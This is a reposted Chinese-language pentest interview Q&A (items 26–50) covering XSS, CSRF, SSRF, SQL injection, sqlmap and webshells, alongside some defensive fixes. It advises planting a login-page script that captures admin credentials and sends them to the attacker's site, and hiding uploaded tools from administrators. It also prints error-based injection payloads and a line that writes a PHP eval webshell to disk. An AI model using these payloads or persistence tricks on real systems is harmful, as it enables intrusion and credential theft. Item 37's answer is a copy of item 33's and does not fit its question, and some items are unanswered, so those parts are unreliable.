26.在有shell的情況下,如何使用xss實作對目標站的長久控制?
后臺登錄處加一段記錄登錄賬號密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號密碼記錄到一個生僻的路徑的檔案中或者直接發到自己的網站檔案中,(此方法適合有價值并且需要深入控制權限的網路),
在登錄后才可以訪問的檔案中插入XSS腳本,
27.后臺修改管理員密碼處,原密碼顯示為*,你覺得該怎樣實作讀出這個用戶的密碼?
審查元素 把密碼處的password屬性改成text就明文顯示了
28.目標站無防護,上傳圖片可以正常訪問,上傳腳本格式訪問則403.什么原因?
原因很多,有可能web服務器配置把上傳目錄寫死了不執行相應腳本,嘗試改后綴名繞過
29.審查元素得知網站所使用的防護軟體,你覺得怎樣做到的?
在敏感操作被攔截,通過界面資訊無法具體判斷是什么防護的時候,F12看HTML體部 比如護衛神就可以在名稱那看到內容,
30.在win2003服務器中建立一個 .zhongzi檔案夾用意何為?
隱藏檔案夾,為了不讓管理員發現你傳上去的工具,
31、sql注入有以下兩個測驗選項,選一個并且闡述不選另一個的理由:
A. demo.jsp?id=2+1
B. demo.jsp?id=2-1
選B,在 URL 編碼中 + 代表空格,可能會造成混淆
32、以下鏈接存在 sql 注入漏洞,對于這個變形注入,你有什么思路?
demo.do?DATA=AjAxNg==
DATA有可能經過了 base64 編碼再傳入服務器,所以我們也要對引數進行 base64 編碼才能正確完成測驗
33、發現 demo.jsp?uid=110 注入點,你有哪幾種思路獲取 webshell,哪種是優選?
有寫入權限的,構造聯合查詢陳述句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統的檔案中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個 Shell,這樣效率更高 通過構造聯合查詢陳述句得到網站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell
34、CSRF 和 XSS 和 XXE 有什么區別,以及修復方式?
XSS是跨站腳本攻擊,用戶提交的資料中可以構造代碼來執行,從而實作竊取用戶資訊等攻擊,修復方式:對字符物體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端采用相同的字符編碼,
CSRF是跨站請求偽造攻擊,XSS是實作CSRF的諸多手段中的一種,是由于沒有在關鍵操作執行時進行是否由用戶自愿發起的確認,修復方式:篩選出需要防范CSRF的頁面然后嵌入Token、再次輸入密碼、檢驗Referer XXE是XML外部物體注入攻擊,XML中可以通過呼叫物體來請求本地或者遠程內容,和遠程檔案保護類似,會引發相關安全問題,例如敏感檔案讀取,修復方式:XML決議庫在呼叫時嚴格禁止對外部物體的決議,
35、CSRF、SSRF和重放攻擊有什么區別?
CSRF是跨站請求偽造攻擊,由客戶端發起 SSRF是服務器端請求偽造,由服務器發起 重放攻擊是將截獲的資料包進行重放,達到身份認證等目的
36、說出至少三種業務邏輯漏洞,以及修復方式?
密碼找回漏洞中存在
1)密碼允許暴力破解、
2)存在通用型找回憑證、
3)可以跳過驗證步驟、
4)找回憑證可以攔包獲取
等方式來通過廠商提供的密碼找回功能來得到密碼,身份認證漏洞中最常見的是
1)會話固定攻擊
2) Cookie 仿冒
只要得到 Session 或 Cookie 即可偽造用戶身份,驗證碼漏洞中存在
1)驗證碼允許暴力破解
2)驗證碼可以通過 Javascript 或者改包的方法來進行繞過
37、圈出下面會話中可能存在問題的項,并標注可能會存在的問題?
get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”HTTP/1.1Host:.com:82User-Agent:Mozilla/5.0 Firefox/40Accept:text/css,/;q=0.1Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3Referer:http://.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;st_uid=N90PLYHLZGJXI-NX01VPUF46W;status=TrueConnection:keep-alive
有寫入權限的,構造聯合查詢陳述句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統的檔案中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個 Shell,這樣效率更高 通過構造聯合查詢陳述句得到網站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell
38、給你一個網站你是如何來滲透測驗的?在獲取書面授權的前提下,
39、sqlmap,怎么對一個注入點注入?
1)如果是get型號,直接,sqlmap -u "諸如點網址".
2) 如果是post型諸如點,可以sqlmap -u "注入點網址” --data="post的引數"
3)如果是cookie,X-Forwarded-For等,可以訪問的時候,用burpsuite抓包,注入處用號替換,放到檔案里,然后sqlmap -r "檔案地址"
40、nmap,掃描的幾種方式
41、sql注入的幾種型別?
1)報錯注入
2)bool型注入
3)延時注入
4)寬位元組注入
42、報錯注入的函式有哪些?10個
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通過floor報錯 向下取整3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select * from(select user())a));
43、延時注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
44、盲注和延時注入的共同點?
都是一個字符一個字符的判斷
45、如何拿一個網站的webshell?上傳,后臺編輯模板,sql注入寫檔案,命令執行,代碼執行, 一些已經爆出的cms漏洞,比如dedecms后臺可以直接建立腳本檔案,wordpress上傳插件包含腳本檔案zip壓縮包等
46、sql注入寫檔案都有哪些函式?
select '一句話' into outfile '路徑'select '一句話' into dumpfile '路徑'select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
47、如何防止CSRF?
1)驗證referer
2)驗證token
詳細:http://cnodejs.org/topic/5533dd6e9138f09b629674fd
48、owasp 漏洞都有哪些?
1)SQL注入防護方法:
2)失效的身份認證和會話管理
3)跨站腳本攻擊XSS
4)直接參考不安全的物件
5)安全配置錯誤
6)敏感資訊泄露
7)缺少功能級的訪問控制
8)跨站請求偽造CSRF
9)使用含有已知漏洞的組件
10)未驗證的重定向和轉發
49、SQL注入防護方法?
1)使用安全的API
2)對輸入的特殊字符進行Escape轉義處理
3)使用白名單來規范化輸入驗證方法
4)對客戶端輸入進行控制,不允許輸入SQL注入相關的特殊字符
5)服務器端在提交資料庫進行SQL查詢之前,對特殊字符進行過濾、轉義、替換、洗掉,
50、代碼執行,檔案讀取,命令執行的函式都有哪些?
1)代碼執行:
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2)檔案讀取:
file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等3)命令執行:
system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/92204.html
標籤:其他
上一篇:volatile的兩大性質